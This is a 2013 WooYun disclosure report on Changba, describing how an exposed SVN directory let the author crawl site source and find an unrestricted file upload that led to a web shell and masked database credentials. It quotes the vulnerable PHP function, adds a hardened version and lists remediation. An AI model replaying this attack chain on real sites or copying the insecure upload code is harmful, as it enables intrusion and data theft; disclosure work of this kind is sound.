Vulnerability Summary

Defect ID: wooyun-2013-036663

Title: Sensitive Information Disclosure Series #1: Sysadmin operational negligence puts 30M+ Changba user records at risk

Vendor: Changba-inc

Author: 猪猪侠

Submitted: 2013-09-10 14:07

Fixed: 2013-10-25 14:08

Disclosed: 2013-10-25 14:08

Vulnerability type: Disclosure of important sensitive information

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2013-09-10: Details sent to the vendor, awaiting vendor action
2013-09-10: Vendor confirmed; details visible to the vendor only
2013-09-20: Details disclosed to core white hats and domain experts
2013-09-30: Details disclosed to regular white hats
2013-10-10: Details disclosed to intern white hats
2013-10-25: Details disclosed to the public

Brief description:

Sometimes a seemingly trivial information leak is enough to bring down an entire company's security.
#Security must be considered as a whole#

Detailed description:

#1 Source of the leak
Because of a web server misconfiguration on Changba's main site, combined with developers' lack of security awareness when deploying code, the metadata left behind by the version control system SVN was published to production.
WooYun: Changba-inc Changba SVN sensitive information leak
A white hat had previously reported this SVN leak, but Changba's fix only restricted access for the http:// origin; the same configuration was never applied to https, so the defect persisted.
https://changba.com/.svn/entries
#2 Write an automated tool to scan for the leak and crawl the exposed source

svn_disclosure.py https://changba.com /
******************************************
* Fetching: https://changba.com
* mkdir changba.com
* http://www.kulv.com/repos/kulv/KTV/www
* http://www.kulv.com/repos/kulv
******************************************
DIR: \
DIR: \help
DIR: \common
DIR: \css
DIR: \voiceofchina
DIR: \banzou
DIR: \incoming
DIR: \personcenter
DIR: \Twig
DIR: \payment
DIR: \activity
DIR: \fm
DIR: \member
DIR: \exportsong
DIR: \game
DIR: \js
DIR: \newindex
DIR: \competition
DIR: \rules
DIR: \account
DIR: \views
DIR: \history
DIR: \signup
DIR: \cashout
DIR: \datePicker
DIR: \games
DIR: \anniversary
DIR: \yunying
DIR: \images
DIR: \agreement
DIR: \data
******************************************
FILE: \mobsong_notfound.html
FILE: \competition_controller.php
FILE: \crontab_share_activity_statistics.php
FILE: \d.html
FILE: \crontab_make_songindex_db.php
FILE: \index.html
FILE: \wochangba.php
FILE: \appstore.php
FILE: \banner_area.php
FILE: \CompetitionMain.php
FILE: \yunying.php
FILE: \help.html
FILE: \question.php
FILE: \pcsong_notfound.html
FILE: \gamegift.php
FILE: \redirect_index.php
FILE: \Activity_Mem.php
FILE: \stats.php
FILE: \buy.php
FILE: \static_activity_page.php
FILE: \recommond.html
FILE: \mindex.html
FILE: \activity_new.php
FILE: \makerecommenduser.php
FILE: \activity_ios.php
FILE: \contact.html
FILE: \qqvipgift.php
FILE: \policy.html
FILE: \old_index.html
FILE: \crontab_share_activity_statistics2.php
FILE: \updateapp.php
FILE: \activity.php
FILE: \qq_callback.php
FILE: \Mobile_Detect.php
FILE: \exchangecenter.html
FILE: \staticcompetition.php
FILE: \gamegift1.php
FILE: \alert.php
FILE: \login.php
FILE: \favicon.ico
FILE: \game.php
FILE: \recommend.php
FILE: \changba_unicom.html
FILE: \crontab_make_songlist_db.php
FILE: \login_success.html
FILE: \guide_sing.php
FILE: \gamehome.php
FILE: \videotest.html
FILE: \activity_no_build.html
FILE: \download.html
FILE: \redirect_song.php
FILE: \anzhuang.html
FILE: \RecommendMusicService.php
******************************************
Author: tianran
Author: guoteng
Author: gaojie
Author: luohongjian
Author: liuyutong
Author: wuhaiwen
Author: xiaokai.zhan
Author: zhouhaixu
Author: eric
Author: chenzhuo
Author: kongmiaomiao
******************************************


#3 With the source in hand, one can audit the code or hunt for other vulnerabilities

[Image: changba_svn_download.jpg]


#4 Digging through the source turned up an upload vulnerability
\competition\common_functions.php, line 159

/**
 * Upload of the organizer's authorization agreement
 *
 * @return array  on error, contains the corresponding errorcode
 */
function uploadAgreement() {
    $result = array();
    if (!isset($_FILES['agreement']['name']) || empty($_FILES['agreement']['name'])) {
        $result['errorcode'] = "EMPTY";
    } elseif ($_FILES["agreement"]["error"] > 0) {
        $result['errorcode'] = "FAIL";
    } elseif (($_FILES["agreement"]["size"] / 1024) > 10240) {
        $result['errorcode'] = "EXCEED_SIZE";
    } else {
        // Destination is inside the web root, so whatever lands here is served by the web server.
        $fileDir = "/home/wwwroot/www.changba.com/agreement/";
        if (!file_exists($fileDir)) {
            mkdir($fileDir, 0777);
        }
        $currentTimestamp = strtotime(date("Y-m-d H:i:s"));
        // The client-supplied name (and therefore its extension) is kept unchanged; only a timestamp is prepended.
        $filename = $currentTimestamp . $_FILES["agreement"]["name"];
        $realPath = $fileDir . $filename;
        if (move_uploaded_file($_FILES["agreement"]["tmp_name"], $realPath)) {
            $result['errorcode'] = "OK";
            $result['filename'] = $filename;
        } else {
            $result['errorcode'] = "FAIL";
        }
    }
    return $result;
}
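The function above checks only that a file was sent and that it is under 10 MB; it never looks at the file's type, keeps the client-chosen name and extension, and writes into a directory the web server serves, which is what turns it into an arbitrary file upload. The following hardened counterpart is an added example written for this page, not Changba's code. It assumes a storage directory outside the web root (AGREEMENT_DIR, a hypothetical path) and that agreements are PDF or image files; the field name "agreement" and the errorcode values are kept from the original so it can drop into the same call site.

```php
<?php
// Added example (not Changba's code): a hardened counterpart to uploadAgreement().
// Assumptions: uploads belong in a directory outside the web root (AGREEMENT_DIR,
// a hypothetical path) and agreements are PDF or image files.

const AGREEMENT_DIR = '/home/wwwroot/uploads_private/agreement/'; // hypothetical, not served by the web server
const MAX_AGREEMENT_BYTES = 10 * 1024 * 1024; // 10 MB, the same limit as the original

// Allowed extension -> MIME type expected from the file *contents* (not from the client-supplied name).
const AGREEMENT_TYPES = [
    'pdf'  => 'application/pdf',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
];

function uploadAgreementSafe(array $file): array {
    if (!isset($file['name'], $file['tmp_name'], $file['error'], $file['size']) || $file['name'] === '') {
        return ['errorcode' => 'EMPTY'];
    }
    if ($file['error'] !== UPLOAD_ERR_OK) {
        return ['errorcode' => 'FAIL'];
    }
    if ($file['size'] > MAX_AGREEMENT_BYTES) {
        return ['errorcode' => 'EXCEED_SIZE'];
    }
    // Only accept a file that PHP itself received through the current request.
    if (!is_uploaded_file($file['tmp_name'])) {
        return ['errorcode' => 'FAIL'];
    }
    // The extension is used only to select an allowlist entry; the original name is never reused.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, AGREEMENT_TYPES)) {
        return ['errorcode' => 'BAD_TYPE'];
    }
    // Check the magic bytes against the claimed type, so a script renamed to .pdf is refused.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== AGREEMENT_TYPES[$ext]) {
        return ['errorcode' => 'BAD_TYPE'];
    }
    // Directory is created with restrictive permissions instead of 0777.
    if (!is_dir(AGREEMENT_DIR) && !mkdir(AGREEMENT_DIR, 0750, true)) {
        return ['errorcode' => 'FAIL'];
    }
    // Server-chosen random name: no guessable timestamp, no path components, no client-controlled extension.
    $filename = bin2hex(random_bytes(16)) . '.' . $ext;
    $realPath = AGREEMENT_DIR . $filename;
    if (!move_uploaded_file($file['tmp_name'], $realPath)) {
        return ['errorcode' => 'FAIL'];
    }
    chmod($realPath, 0640); // readable by the application only, never executable
    return ['errorcode' => 'OK', 'filename' => $filename];
}

// Usage in the request handler (the upload form field is still named "agreement"):
// $result = uploadAgreementSafe($_FILES['agreement'] ?? []);
```

Because the stored file lives outside the document root, it must be handed back through an application endpoint (for example with readfile() and a fixed Content-Type) rather than by URL, which also keeps the random filename from being enumerated.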


[Image: changba_upload.jpg]


Proof of vulnerability:

#5 Exploiting the arbitrary file upload

[Image: changba_shell.jpg]


#6 Viewing the database configuration

<?php
// ==========================================
// ====== Dedicated DB for vertical sharding ======
// ==========================================
/* mysql client: write database address */
$config['ZuitaoKtvServer_client']['servername'] = '192.168.*.***';
$config['ZuitaoKtvServer_client']['port'] = 3306;
$config['ZuitaoKtvServer_client']['username'] = '******';
$config['ZuitaoKtvServer_client']['password'] = 'PS***********94';
$config['ZuitaoKtvServer_client']['pconnect'] = 0;
$config['ZuitaoKtvServer_client']['dbname'] = 'changba_client';
$config['ZuitaoKtvServer_client']['charset'] = 'utf8';
/* mysql client: read database address */
$config['ZuitaoKtvServer_client_read']['servername'] = '192.168.*.***';
$config['ZuitaoKtvServer_client_read']['port'] = 3306;
$config['ZuitaoKtvServer_client_read']['username'] = '****';
$config['ZuitaoKtvServer_client_read']['password'] = 'PS***********94';
$config['ZuitaoKtvServer_client_read']['pconnect'] = 0;
$config['ZuitaoKtvServer_client_read']['dbname'] = 'changba_client';
$config['ZuitaoKtvServer_client_read']['charset'] = 'utf8';

Remediation:

#1 Make sure the vulnerability fix is applied completely
#2 Have professional security staff audit the code
#3 The white hats on WooYun's crowdsourced testing platform can help eliminate the remaining boundary risks

Copyright notice: when reposting, please credit 猪猪侠@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2013-09-10 17:49

Vendor reply:

I recall we already confirmed this this morning? Either way, thanks to this friend; please send us your contact details so we can show our appreciation, and more suggestions are welcome!

Latest status:

None yet